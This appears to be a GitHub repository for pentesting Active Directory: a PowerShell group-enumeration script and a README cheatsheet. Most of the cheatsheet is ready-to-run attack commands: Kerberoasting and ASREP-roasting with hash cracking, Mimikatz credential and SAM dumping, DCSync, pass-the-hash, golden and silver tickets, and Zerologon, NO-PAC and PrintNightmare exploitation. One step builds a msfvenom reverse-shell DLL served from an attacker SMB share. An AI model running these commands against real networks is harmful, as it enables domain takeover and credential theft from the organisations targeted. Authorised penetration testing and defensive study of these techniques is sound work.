├── Nested Groups Enumeration
    ├── README.md
    └── NestedGroupsEnumeration.ps1
└── README.md


/Nested Groups Enumeration/README.md:
--------------------------------------------------------------------------------
1 | This is a script that automatically enumerates nested groups inside the Active Directory. It traverses the groups programatically and shows every user belonging to them.


--------------------------------------------------------------------------------
/Nested Groups Enumeration/NestedGroupsEnumeration.ps1:
--------------------------------------------------------------------------------
 1 | $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
 2 | $PDC = ($domainObj.PdcRoleOwner).Name
 3 | $SearchString = "LDAP://"
 4 | $SearchString += $PDC + "/"
 5 | $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
 6 | $SearchString += $DistinguishedName
 7 | $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
 8 | $objDomain = New-Object System.DirectoryServices.DirectoryEntry
 9 | $Searcher.SearchRoot = $objDomain
10 | $Searcher.filter="(&(objectClass=Group)(member=*))"
11 | $GroupsWithMembers = $Searcher.FindAll()
12 | Foreach($GroupWithMember in $GroupsWithMembers)
13 | {
14 | 	Write-Host " - "-NoNewLine
15 | 	$GroupWithMember.Properties.name
16 | 	$GroupMembers = $GroupWithMember.Properties.member
17 | 	Foreach($GroupMember in $GroupMembers)
18 | 	{
19 | 		Write-Host " | "
20 | 		Write-Host " +-- " -NoNewLine
21 | 		$GroupMember
22 | 	}
23 | 	Write-Host "`n"
24 | }
25 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # Pentesting Active Directory 
  2 | This is a cheatsheet of tools and commands that I use to pentest Active Directory. It includes Windows, Impacket and PowerView commands, how to use Bloodhound and popular exploits such as Zerologon and NO-PAC.
  3 | 
  4 | <br>
  5 | 
  6 | ## Enumeration
  7 | 
  8 | ### Initial system enumeration
  9 | 
 10 | See local accounts
 11 | > net user
 12 | 
 13 | See all of the accounts in the domain
 14 | > net user /domain
 15 | 
 16 | Check if an account is a Domain Admin
 17 | > net user \<account-name> domain
 18 | 
 19 | See groups in the AD domain
 20 | >net group /domain
 21 | 
 22 | Sync the clock with the DC (Domain Controller).
 23 | > ntpdate \<dc-ip>
 24 | 
 25 | ### Powerview
 26 | 
 27 | > . .\PowerView.ps1
 28 | 
 29 | **Information about the domain**
 30 | > 
 31 | > Get-NetDomain
 32 | > 
 33 | > Get-NetDomain-Controller
 34 | > 
 35 | > Get-Domain-Policy
 36 | 
 37 | See password rules 
 38 | > (Get-DomainPolicy)."system access" 
 39 | 
 40 | **Information about users**
 41 | Look for passwords/personal information in the description
 42 | > Get-NetUser 
 43 | > 
 44 | > Get-NetUser | select cn
 45 | > 
 46 | > Get-NetUser | select description
 47 | > 
 48 | > Get-NetUser | select samaccountname
 49 | >
 50 | > Get-UserProperty -Properties pwdlastset
 51 | >
 52 | > Get-UserProperty -Properties logoncount
 53 | 
 54 | **Information about computers**
 55 | > Get-NetComputer
 56 | > 
 57 | > Get-NetComputer -FullData
 58 | > 
 59 | > Get-NetGroup
 60 | >
 61 | > Get-NetGroup -GroupName \<group-name>
 62 | >
 63 | > Get-NetGroup -GroupName "Domain Admins"
 64 | > 
 65 | > Get-NetGroupMember -GroupName "Domain Admins"
 66 | 
 67 | **See SMB shares**
 68 | > Invoke-ShareFinder
 69 | 
 70 | <br>
 71 | 
 72 | ### Crackmapexec
 73 | A few quick commands that I always use if I have no information about the machine
 74 | > crackmapexec smb \<ip>
 75 | > 
 76 | > crackmapexec smb \<ip> -u '' -p ''
 77 | > 
 78 | > crackmapexec smb \<ip> -u 'guest' -p ''
 79 | 
 80 | <br>
 81 | 
 82 | ## Exploitation
 83 | 
 84 | ### ASREP-Roasting
 85 | With a list of valid usernames and no passwords, you can check if Kerberos has pre-authentication disabled by ASREP-Roasting
 86 | > impacket-GetNPUsers -format john -dc-ip \<dc-ip>  -usersfile \<users-list> \<name_of_domain>/\<hostname>
 87 | 
 88 | or
 89 | > python3 GetNPUsers.py \<domain>/\<user> -no-pass -dc-ip \<dc-ip>
 90 | 
 91 | To crack obtained hashes, save them in a file and give it to John. I usually use rockyou.txt to brute-force the passwords
 92 | > john --wordlist=\<passwords-file> \<hashes-file>
 93 | 
 94 | Alternative
 95 | > hashcat -m 18200 -a 0 \<hashes-file> \<passwords-file>
 96 | 
 97 | If you obtained any passwords, check them
 98 | > crackmapexec smb \<ip> -U \<user> -p \<password>
 99 | 
100 | If they are valid, further enumerate the domain
101 | > crackmapexec smb \<ip> -U \<user> -p \<password> --shares
102 | > 
103 | > crackmapexec smb \<ip> -U \<user> -p \<password> --rid-brute
104 | > 
105 | > crackmapexec smb \<ip> -U \<user> -p \<password> --users
106 | >
107 | > crackmapexec smb \<ip> -U \<user> -p \<password> --lsa
108 | 
109 | 
110 | Try to connect using Windows Remote Management
111 | > crackmapexec winrm \<ip> -U \<user> -p \<password>
112 | 
113 | Try to connect using pass-the-hash (the user needs to have administrative rights)
114 | > pth-winexe -U \<user>%\<hash>%\<SMB-share-in-UNC-format> //\<ip> cmd
115 | 
116 | <br>
117 | 
118 | ### Kerberoasting
119 | Two different ways to perform this attack.
120 | 
121 | 1. From your attacking machine, using Impacket
122 |     > impacket-GetUserSPNs -dc-ip \<ip> \<domain>/\<user>
123 | 
124 |     If successful
125 |     > impacket-GetUserSPNs -dc-ip \<ip> \<domain>/\<user> --request
126 | 
127 |     To crack the hash
128 |     > hashcat -m 13100 -a 0 \<hash> \<wordlist> --force 
129 | 
130 | 2. On the target machine, using Mimikatz
131 |    
132 |    Generate tickets in Powershell
133 |    > Add-Type -AssemblyName System.IdentityModel 
134 |    >
135 |    > New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '\<service>/\<hostname>.\<domain>.com'
136 |    > 
137 |    > klist
138 | 
139 |    In Mimikatz 
140 |    > kerberos::list /export
141 | 
142 |    Grab the tickets and crack them
143 |    > python /usr/share/kerberoast/tgsrepcrack.py \<wordlist> \<tickets>
144 | 
145 | <br>
146 | 
147 | ### Mimikatz & pivoting
148 | If you managed to get access on the machine and you are able to transfer Mimikatz, you can use the following commands.
149 | > privilege::debug 
150 | 
151 | **Dump credentials of all logged-in users**
152 | > 
153 | > sekurlsa::logonpasswords
154 | > 
155 | > lsadump::lsa /patch
156 | 
157 | **Dump the SAM database (equivalent to hashdump in a Meterpreter shell)**
158 | > token::elevate 
159 | > 
160 | > lsadump::sam
161 | 
162 | **Overpass-the-hash**
163 | > sekurlsa::pth /user:\<username> /domain:\<domain-name> /ntlm:\<ntlm-hash> /run:PowerShell.exe
164 | 
165 | **Pass-the-ticket (silver ticket)**
166 | 
167 | Get the SID of the user
168 | > whoami /user
169 | 
170 | In Mimikatz
171 | > kerberos::purge
172 | > kerberos::golden /user:\<username> /domain:\<domain-name> /sid:\<sid> /target:\<url> /service:\<service> /rc4:\<rc4hash> /ptt
173 | 
174 | If you have a silver ticket, connect using Impacket
175 | > export KRBSCCNAME=\<path-to-silver-ticket>
176 | > 
177 | > impacket-wmiexec -k -no-pass \<username>@\<domain>
178 | 
179 | **Golden ticket**
180 | 
181 | If we get the krbtgt (password hash of domain user account), we can create our own golden tickets = custom TGTs)
182 | 
183 | Get the krbtgt
184 | > privilege::debug
185 | > 
186 | > lsadump::lsa /patch 
187 | 
188 | > kerberos::purge
189 | 
190 | Create a golden ticket
191 | > kerberos::golden /user:\<fake-username> /domain:\<domain> /sid:\<sid> /krbtgt:\<krbtgt-hash> /ptt
192 | 
193 | Launch a new cmd
194 | > misc::cmd
195 | 
196 | Use PsExec to escalate privileges
197 | > psexec.exe \\\<dc-name> cmd.exe
198 | 
199 | **DC-SYNC**
200 | > lsadump::dcsync /user:Administrator
201 | 
202 | <br>
203 | 
204 | ### Bloodhound and Sharphound
205 | Bloodhound needs an ingestor to retrieve files that then have to be uploaded in the application lying on your attack machine.
206 | 
207 | **Bloodhound-Python**
208 | > bloodhound-python -c All -u \<user> -p \<password> -gc '\<hostname>.\<domain-name>' -dc '\<hostname>.\<domain-name>' -d '\<domain-name>' -ns \<dc-ip>
209 | 
210 | **Sharphound**
211 | 
212 | You can use Sharphound two ways.
213 | 1. Transfer the .exe file (which you can download from here: https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors) on the target machine and run it with the following command
214 |    > SharpHound.exe -c All
215 | 2. Transfer the Sharphound.ps1 Powershell script on the target machine and run it
216 |    > . .\SharpHound.ps1
217 |    >
218 |    > Invoke-Bloodhound -CollectionMethod All -Domain \<domain-name> -ZipFileName loot.zip
219 | 
220 | <br>
221 | 
222 | ### Zerologon
223 | This exploit should be used very carefully and with the guarantee that it can be reversed. It changed the domain controller's password and interrupts communication with other computers in the domain.
224 | To `test` the vulnerability without exploiting it, I used the following script: https://github.com/SecuraBV/CVE-2020-1472
225 | 
226 | > python3 zerologon_tester.py \<DC-name> \<DC-ip>
227 | 
228 | To exploit it, you can find the Zerologon exploit here: https://github.com/dirkjanm/CVE-2020-1472, as well as restoration steps.
229 | 
230 | > python3 cve-2020-1472-exploit.py \<DC-name> \<DC-ip>
231 | 
232 | Get all of the information (usernames + hashes)
233 | > impacket-secretsdump -just-dc \<domain>/\<DC-name>\$@\<DC-ip>
234 | 
235 | **To restore**
236 | 
237 | Get the lanman_hash:ntlm_hash from the output of the previous command
238 | > impacket-secretsdump administrator@\<DC-ip> -hashes \<lanman_hash:ntlm_hash>
239 | 
240 | Obtain the plaintext password from the output of the previous command
241 | > python3 restorepassword.py \<domain>/\<DC-name>@\<DC-name> -target-ip \<DC-ip> -hexpass \<plaintext-password>
242 | 
243 | <br>
244 | 
245 | ### NO-PAC (sam-the-admin)
246 | 
247 | This exploit is possible if you have any valid credentials from a user in the Active Directory.
248 | You can find the exploit here: https://github.com/WazeHell/sam-the-admin
249 | > python3 sam_the_admin.py -dc-ip \<DC-ip> \<domain>/\<user>:\<password>
250 | 
251 | <br>
252 | 
253 | ### PrintNightmare 
254 | You can find the exploit here: https://github.com/cube0x0/CVE-2021-1675
255 | 
256 | For this exploit, you need valid user credentials.
257 | 
258 | Check if the system is vulnerable:
259 | > rpcdump.py \<target-ip> | egrep 'MS-RPRN|MS-PAR'
260 | 
261 | If you get `Print System Asynchronous Remote Protocol & Print System Remote Protocol` in the output, it is vulnerable.
262 | 
263 | Create a .dll file to execute the reverse shell
264 | > msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=\<target-ip> LPORT=\<target-port> > shell.dll
265 | 
266 | Start a listener on the port used in the command.
267 | 
268 | Host the file on Samba
269 | 
270 | > smbserver.py share pwd -smb2support
271 | 
272 | > python3 CVE-2021-1675.py \<domain>/\<user>:\<password>@\<target-ip> '\\\<attacking-machine-ip>\share\shell.dll'
273 | 
274 | 
275 | <br>
276 | 
277 | ### Other cheatsheets
278 | 
279 | Some cheatsheets that I've used in the past and I've found very useful are:
280 | 
281 | [https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet)
282 | 
283 | [https://gist.github.com/Rajchowdhury420/da4d12a3db13aa5232fcd4e7d96ec6a1](https://gist.github.com/Rajchowdhury420/da4d12a3db13aa5232fcd4e7d96ec6a1)
284 | 
285 | [https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a](https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a)
286 | 


--------------------------------------------------------------------------------